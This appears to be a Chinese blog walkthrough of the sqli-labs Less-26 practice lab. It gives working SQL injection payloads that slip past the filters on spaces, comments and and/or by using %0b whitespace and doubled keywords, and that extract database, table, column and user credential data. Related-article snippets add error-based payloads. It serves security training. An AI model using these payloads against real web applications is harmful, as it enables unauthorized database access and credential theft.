[网络安全]sqli-labs Less-26 解题详析

最新推荐文章于 2024-12-23 01:48:15 发布

原创最新推荐文章于 2024-12-23 01:48:15 发布 · 3.6k 阅读

5 ·

CC 4.0 BY-SA版权

原创文章，禁止转载，否则保留追究法律责任的权利。

文章标签：

#web安全 #数据库 #sql #sqlilabs

Sqli-Labs靶场攻防实战专栏收录该内容

28 篇文章

订阅专栏

本文介绍了如何使用SQL注入技术，通过联合查询的方式过滤特定符号并获取数据库名、表名、列名以及用户数据。重点展示了在Sqli-Labs靶场中利用%0b、%0a等特殊字符进行的操作。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

本关过滤 空格 or and /* # -- / 等符号

可用过滤符如下

%09	TAB键（水平）
%0a	新建一行
%0c	新的一页
%0d	return功能
%0b	TAB键（垂直）
%a0	空格

使用联合查询，具体原理及解题方法可见专栏：Sqli-Labs靶场专栏

查库名：

id=0'%0bunion%0bselect%0b1,database(),3||'1'='1

回显如下：

在这里插入图片描述

查表名：

id=0'%0bunion%0bselect%0b2,group_concat(table_name),4%0bfrom%0binfoorrmation_schema.tables%0bwhere%0btable_schema=database()%26%26'1'='1

回显如下：

在这里插入图片描述

查列名：

id=0'%0bunion%0bselect%0b1,group_concat(column_name),3%0bfrom%0binfoorrmation_schema.columns%0bwhere%0btable_name='users'%0b%26%26%0btable_schema=database()%26%26'1'='1

回显如下：

在这里插入图片描述

查数据：

id=0'%0bunion%0bselect%0b2,(select%0bgroup_concat(concat_ws('-',id,username,passwoorrd))%0bfrom%0busers),4%0b||%0b'1'='1

回显如下：

在这里插入图片描述

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

秋说

关注关注

6
点赞
踩
5

收藏

觉得还不错? 一键收藏
5
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
打赏
打赏
打赏举报

举报

专栏目录

sqli-labs ----less-26---37--练习

代码审计

03-07

1076

sqli-labs————Less-26（绕空格、/*、#等）该关卡提示空格和注释被转义，我们测试一下： http://www.sqli.com/Less-26/?id=1’报错 sqli-labs-master/Less-26/?id=1’ --+ 依旧报错，我添加的注释不见了，应该是注释被转义成了空字符，我们换成;%00测试一下： http://www.sqli.com/Less-26/?id=1%20and%20sleep(4);%00 and应该被转义了 phpstorm

SQLi LABS Less 25 联合注入+报错注入+布尔盲注

热门推荐

wangyuxiang946的博客

06-28

1万+

SQLi 第二十五关，SQLi-LABS Less-25，SQLi-LABS Less 25，SQLiLABS Less25，SQLi Less 25

5 条评论您还未登录，请先登录后发表或查看评论

Sqli-labs less 26

weixin_34388207的博客

08-11

245

Less-26 TIPS:本关可能有的朋友在windows下无法使用一些特殊的字符代替空格，此处是因为apache的解析的问题，这里请更换到linux平台下。本关结合25关，将空格，or，and,/*,#,--,/等各种符号过滤，此处对于and，or的处理方法不再赘述，参考25.此处我们需要说明两方面：对于注释和结尾字符的我们此处只能利用构造一个 ' 来闭合后面到 ' ；对于空格，有较多的...

Sqlilabs Less-26-26a Trick with spaces and comments

baynk的博客

03-31

515

Sqlilabs Less-26 Trick with spaces and comments with single quote 手工注入加quote报错，然后注释没效果，给出的提示看起来似乎是被过滤掉了，用之前手法闭合。然后发现and好像也被过滤了，继续双写试试，但是结果好像空格也被过滤了。。。用了各种编码都不行后，查了资料发现用%a0或者%0b替代(%a0好像是不间断空格，会在html显示...

【sqli-labs】 less26 GET- Error based -All you SPACES and COMMENTS belong to us(GET型基于错误的去除了空格和注释的注入)...

ajxi63204的博客

01-27

330

看了下源码所有的注释形式和反斜线，and，or都被了过滤掉了单引号没有过滤空格也被过滤了 http://localhost/sqli-labs-master/Less-26/?id=1' http://localhost/sqli-labs-master/Less-26/?id=1' ' 看了网上的一些方法都是使用了%a0替换掉了空格 ...

网络安全 - Web 安全靶场 - sqli-labs-php7.zip

10-13

该资源包来源于GitHub上的一个开源项目，由专业的网络安全爱好者或开发者维护和更新。通过sqli-labs-php7.zip，用户可以搭建一个模拟的SQL注入环境，从而在不危害真实系统的前提下，进行各种SQL注入攻击和防御的练习...

phpstudy+靶场sqli-labs-master下载

11-08

【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全，尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...

Sqli-labs-maste 靶场的下载， phpStudy 下载

09-13

在信息技术安全领域，SQL注入是常见的攻击手段，攻击者通过在Web应用的输入字段中插入恶意SQL语句，试图破坏...phpStudy和Sqli-labs-maste的结合使用，为网络安全的学习和研究提供了一个安全、高效、便捷的学习平台。

sqli-labs-master靶场安装下载

04-01

安装phpstudy、sqli-labs 适合人群：小白安装sqli-labs报错如何解决

sqli-labs-master.zip

01-18

Sqli-labs是一个在线的SQL注入练习平台，提供了一系列关卡供用户练习SQL注入的技巧和防范方法。在这个平台上，用户可以尝试...Sqli-labs旨在帮助网络安全专业人员提高技能和意识，以便更好地应对现实世界中的网络攻击。

Sqli-labs之Less-26和Less-26a

m0_46315342的博客

06-04

2727

&nbs...

sqli-labs/Less-26关

m0_71299382的博客

11-20

1635

sqli-labs第二十六关

sqli-labs解题思路之less-26 and less-26a

weixin_73904941的博客

10-04

1263

sqli-labs 第26关和 26a关 sql注入-空格绕过-逻辑符双写绕过-注释符绕过

sqli-labs靶场第26-30关

yjh20041010的博客

12-16

968

这关将逻辑运算符，注释符以及空格给过滤了我们先使用单引号进行闭合这时我们查看源代码可以看到这一关过滤了很多字符可以看到这里将or and / -- # 空格等字符都被注释了空格被过滤了我们可以使用()来代替，and和or可以使用双写来绕过因为报错注入空格少，所以这里我们使用报错注入查询数据库名查询表名字段名以及字段下的数据我们获取到了数据库的数据自此通关。

sqli-labsSQL手工注入第26-30关

m0_75036923的博客

08-24

1293

http://127.0.0.1/Less-26/?id=11%27%26extractvalue(1,concat(%27~%27,database(),%27~%27))%261=%27http://127.0.0.1/Less-26/?id=1%27||(updatexml(1,concat(1,(select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema=%27security%27))),1

sql-labs闯关26~31

qq_44663230的博客

09-03

2852

sql-labs闯关26-28a 29~31暂时不做

SQL-labs的第26关——空格和注释被过滤报错注入（Get）

qq_73393033的博客

08-04

902

我们可以确定'号就是该网站的闭合符号。'号可能是闭合方式。

SQLi-LABS通关攻略【26-30关】

qq_65852138的博客

08-25

1030

SQLi-LABS通关攻略【26-30关】

sqli-labs(第二十六关-第三十关卡通关攻略)

qq_54694921的博客

12-23

1120

sqli-labs(第二十六关-第三十关卡通关攻略)

[网络安全]sqli-labs Less-1 解题详析